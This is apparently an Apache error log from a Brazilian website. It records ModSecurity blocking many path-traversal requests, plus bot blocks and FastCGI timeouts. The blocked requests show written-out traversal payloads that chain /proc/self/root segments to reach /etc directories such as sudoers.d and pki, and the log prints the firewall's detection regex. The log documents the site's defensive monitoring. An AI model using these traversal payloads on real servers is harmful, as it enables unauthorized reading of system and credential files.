[Thu Mar 19 14:52:21.052639 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:37794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw31da6ubjKNq_cu4Z00QAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:25.815929 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:37800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw32QkwaGbbGflqUZDoBgAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:30.454638 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.243.128:58340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw33v-YZRR_7pZ7nDKpPQAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:34.130631 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41154] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:52:35.014690 2026] [:error] [pid 7545:tid 140411666392832] [client 74.7.243.128:58342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3438B84UptSoTJtYtmgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:39.727945 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:60006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw359a6ubjKNq_cu4Z01AAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:44.504793 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:60014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw37BCii7xarUs8iHYHxAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:49.380307 2026] [:error] [pid 7545:tid 140411708356352] [client 74.7.243.128:60022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw38X8B84UptSoTJtYtrwAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:54.044094 2026] [:error] [pid 7545:tid 140411716749056] [client 74.7.228.61:42410] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw39n8B84UptSoTJtYtswAAAYM"]
[Thu Mar 19 14:52:58.169799 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42074] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:52:59.855446 2026] [:error] [pid 7545:tid 140411666392832] [client 74.7.243.128:40288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3-38B84UptSoTJtYtwgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:53:04.570564 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:34398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4AAkwaGbbGflqUZDoLAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:53:08.338435 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.244.43:58536] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw4BP-YZRR_7pZ7nDKpSwAAA8g"]
[Thu Mar 19 14:53:19.916881 2026] [mime_magic:error] [pid 27293:tid 140411741927168] (70014)End of file found: [client 57.141.18.32:49594] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:53:21.389810 2026] [proxy_fcgi:error] [pid 7893:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43010] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:53:23.833932 2026] [mime_magic:error] [pid 8307:tid 140411741927168] (70014)End of file found: [client 57.141.18.43:49966] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:53:36.603733 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:34404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4IAbLMZ6AikZjR9V7cwAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:53:44.422408 2026] [mime_magic:error] [pid 17887:tid 140411725141760] (70014)End of file found: [client 57.141.18.64:50826] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:53:47.126711 2026] [proxy_fcgi:error] [pid 7235:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:53:51.703394 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:43258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4L-oXxyEfFpUF8f8qzQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:53:58.856623 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:54494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4Nvu8EFLIOrSqIpvG3gAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:54:07.291567 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:33604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4P_u8EFLIOrSqIpvG4gAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:54:10.187246 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:50794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4Qta6ubjKNq_cu4Z0-wAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:54:12.859644 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:50800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4RNa6ubjKNq_cu4Z0_wAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:54:16.125821 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:54:39.129785 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46106] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:55:04.217779 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47042] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:55:05.406998 2026] [mime_magic:error] [pid 7893:tid 140411540502272] (70014)End of file found: [client 57.141.18.15:53968] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:55:20.468728 2026] [mime_magic:error] [pid 14269:tid 140411574073088] (70014)End of file found: [client 74.7.241.31:60202] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/kbd/keymaps/legacy/mac
[Thu Mar 19 14:55:30.009021 2026] [mime_magic:error] [pid 8307:tid 140411741927168] (70014)End of file found: [client 57.141.18.92:54390] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:55:31.133794 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:55:40.986186 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:43386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4nOoXxyEfFpUF8f8rHAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:55:45.598869 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:33672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4ocdf6f5d65gmYZSZrQAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:55:53.797952 2026] [mime_magic:error] [pid 17887:tid 140411548894976] (70014)End of file found: [client 57.141.18.18:55664] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:55:55.847819 2026] [proxy_fcgi:error] [pid 7893:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48926] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:56:02.629785 2026] [mime_magic:error] [pid 14269:tid 140411574073088] (70014)End of file found: [client 57.141.18.99:56192] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:56:13.109556 2026] [mime_magic:error] [pid 15826:tid 140411540502272] (70014)End of file found: [client 57.141.18.6:56590] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:56:18.686509 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:33672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw4wsdf6f5d65gmYZSZzgAAAs0"], referer: 